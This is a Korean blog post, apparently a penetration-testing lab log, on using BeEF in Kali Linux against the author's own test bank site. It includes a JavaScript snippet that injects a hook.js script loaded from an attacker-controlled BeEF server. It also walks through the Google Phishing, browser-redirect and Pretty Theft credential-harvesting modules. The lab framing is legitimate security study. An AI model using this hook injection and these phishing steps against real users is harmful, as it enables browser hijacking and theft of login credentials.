📌 Kali Linux에서 BeEF (Browser Exploitation Framework)를 사용
: 웹 브라우저의 보안 취약점 테스트
1. BEEF 설치
2. BeEF 실행 ( 비밀번호 변경해줘야 함)
└─$ sudo ./beef
[16:42:09][!] ERROR: Don't use default username and password!
[16:42:09] |_ Change the beef.credentials.passwd in /etc/beef-xss/config.yaml
# /etc/beef-xss/config.yaml 파일의 비밀번호 값을 수정
vi /etc/beef-xss/config.yaml
# 초기 비밀번호 값을 변경해준 후 실행
sudo ./beef
✅ BEEF가 실행되면, 기본적으로 http://localhost:3000/ui/panel에서 웹 인터페이스에 접근할 수 있다.
username : beef
password : p@ssw0rd
3. BeEF 서버와 웹 브라우저 간 연결 시도
* 웹 페이지에 스크립트 삽입
더보기
var script = document.createElement('script');
script.src = 'http://10.0.2.15:3000/hook.js';
document.head.appendChild(script);→ console 들어가서 위 코드 입력
→ BeEF 서버와 웹 브라우저 간 연결 시도가 가능
→ beef를 확인해보면 웹 페이지랑 연결된 것을 알 수 있습니다.
더보기
| [참고] 색깔 표시 의미 녹 색 : 사용자가 그 모듈의 작동을 알아채지 못할 것이라는 뜻이다. 노란색 : 경고 메세지 상자 등을 통해서 사용자가 공격을 알아 챌 수 있음을 뜻한다. 빨간색 : 해당 공격이 작동할 가능성이 낮음을 뜻한다. 회 색 : 대상 구성에 대해 해당 공격이 작동한다고 확인된 적이 없음을 뜻한다. |
< Google Phishing > Google을 사칭하여 사용자로부터 민감한 정보를 수집하는 사이버 공격
✅ 웹 페이지를 공격해 본다
: commands > Module Tree > Social Engineering > Google Phishing > Execute
✅ 확인해보면 구글 사이트 같지만 주소가
http://182.230.(000).(000)/bank/bank/login.php임을 알 수 있다.
< 특정 URL로 리다이렉트 >
✅특정 웹 사이트로 이동시키기
: Command > Module Tree > Browser > Hooked Domain > Redirect Browser
: 이동 시킬 사이트는 google.com
✅ http://182.230.(000).(000)/bank/bank/login.php 입력하면
google.com 사이트가 나온다.
✅ 내가 만든 사이트로 들어가면 구글로 리다이렉트 되는 것을 확인
< Pretty Theft 공격 >
: 이메일과 비밀번호와 같은 입력 값이 그대로 나타나는 현상은, 공격자가 사용자가 입력한 정보를 수집하기 위해 가짜 로그인 폼을 사용하는 방식과 관련 ( 사용자의 아이디와 비밀번호 훔치기)
✅ 공격자는 사용자가 로그인 정보를 입력할 수 있도록 디자인된 가짜 웹 페이지를 만듭니다.
이 페이지는 원본 사이트(예: Google, Facebook)와 유사하게 보이도록 설계
✅ 사용자가 가짜 로그인 폼에 이메일과 비밀번호를 입력하고 제출하면,
이 정보는 공격자가 지정한 서버로 전송
✅ 입력한 값을 그대로 가져오는 것을 확인
'project' 카테고리의 다른 글
| 프로젝트 (bank 웹 애플리케이션에서 CSRF 공격 시뮬레이션 - 비밀번호 변경 악용) (0) | 2024.10.25 |
|---|---|
| 프로젝트 (bank - 웹 모의해킹 / OWASP Zap 사용) (0) | 2024.10.23 |
| 프로젝트 (bank - 데이터베이스 모의해킹/ sqlmap활용) (0) | 2024.10.15 |
| 프로젝트 (bank 취약점 분석 / nmap 활용) (0) | 2024.10.15 |
| 프로젝트 (bank 취약점 분석 / DIRB, NIKTO, Burp suite) (0) | 2024.10.11 |